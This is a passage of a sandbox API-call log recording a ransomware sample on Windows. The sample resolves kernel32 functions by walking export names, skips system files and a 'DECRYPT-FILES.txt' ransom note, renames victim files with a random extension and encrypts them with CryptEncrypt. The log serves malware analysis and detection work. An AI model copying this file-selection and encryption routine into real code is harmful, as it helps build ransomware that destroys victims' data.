lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.358] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.358] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.358] lstrlenA (lpString="DELETEATOM") returned 10 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.358] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.358] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.358] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.358] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.358] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.358] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.358] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.358] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.358] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.358] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.358] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.359] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.359] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.359] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.359] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.359] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.359] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.359] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.359] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.359] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.359] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.359] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.359] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.359] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.359] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.359] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.359] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.359] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.359] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.359] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.360] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.360] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.360] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.360] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.360] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.360] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.360] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.360] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.360] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.360] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.360] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp") returned 67 [0083.360] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp.EPkXYR") returned 74 [0083.360] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wsmc4qxiw6wmrmv.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp.EPkXYR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wsmc4qxiw6wmrmv.bmp.epkxyr"), dwFlags=0x0) returned 1 [0083.361] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.361] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.361] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.362] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4415530, ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0x5d1a43d0, ftLastAccessTime.dwHighDateTime=0x1d4d1c2, ftLastWriteTime.dwLowDateTime=0x5d1a43d0, ftLastWriteTime.dwHighDateTime=0x1d4d1c2, nFileSizeHigh=0x0, nFileSizeLow=0xbe26, dwReserved0=0x0, dwReserved1=0x0, cFileName="wSmC4QXIW6WmrmV.bmp", cAlternateFileName="WSMC4Q~1.BMP")) returned 0 [0083.362] FindClose (in: hFindFile=0x5f8c58 | out: hFindFile=0x5f8c58) returned 1 [0083.362] CloseHandle (hObject=0x438) returned 1 [0083.362] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x495d3c40, ftCreationTime.dwHighDateTime=0x1d4d392, ftLastAccessTime.dwLowDateTime=0x30ea590, ftLastAccessTime.dwHighDateTime=0x1d4c982, ftLastWriteTime.dwLowDateTime=0x30ea590, ftLastWriteTime.dwHighDateTime=0x1d4c982, nFileSizeHigh=0x0, nFileSizeLow=0x15109, dwReserved0=0x0, dwReserved1=0x0, cFileName="g_JQdClT.mp3", cAlternateFileName="")) returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="autorun.inf") returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="boot.ini") returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="desktop.ini") returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="ntuser.dat") returned -1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="iconcache.db") returned -1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="bootsect.bak") returned 1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="ntuser.dat.log") returned -1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="thumbs.db") returned -1 [0083.362] lstrcmpiW (lpString1="g_JQdClT.mp3", lpString2="Bootfont.bin") returned 1 [0083.362] lstrlenW (lpString="g_JQdClT.mp3") returned 12 [0083.362] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0083.362] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0083.362] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0083.362] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0083.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.362] lstrlenW (lpString="g_JQdClT.mp3") returned 12 [0083.362] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="g_JQdClT.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3" [0083.362] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_jqdclt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.363] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=86281) returned 1 [0083.363] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.363] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.363] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.363] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.364] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.364] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.364] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.365] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.366] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.367] CloseHandle (hObject=0x43c) returned 1 [0083.367] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.367] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.367] CloseHandle (hObject=0x0) returned 0 [0083.368] CloseHandle (hObject=0x438) returned 1 [0083.368] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.368] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.368] GetTickCount () returned 0x114d4fc [0083.368] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.368] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.368] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.369] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.369] lstrlenA (lpString="kernel32.dll") returned 12 [0083.369] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.369] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.369] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.369] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.369] lstrlenA (lpString="ADDATOMA") returned 8 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.369] lstrlenA (lpString="ADDATOMW") returned 8 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.369] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.369] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.369] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.369] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.369] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.370] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.370] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.370] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.370] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.370] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.370] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.370] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.370] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.370] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.370] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.370] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.370] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.370] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.370] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.370] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.370] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.370] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.370] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.370] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.371] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.371] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.371] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.371] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.371] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.371] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.371] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.371] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.371] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.371] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.371] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.371] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.371] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.371] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.371] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.371] 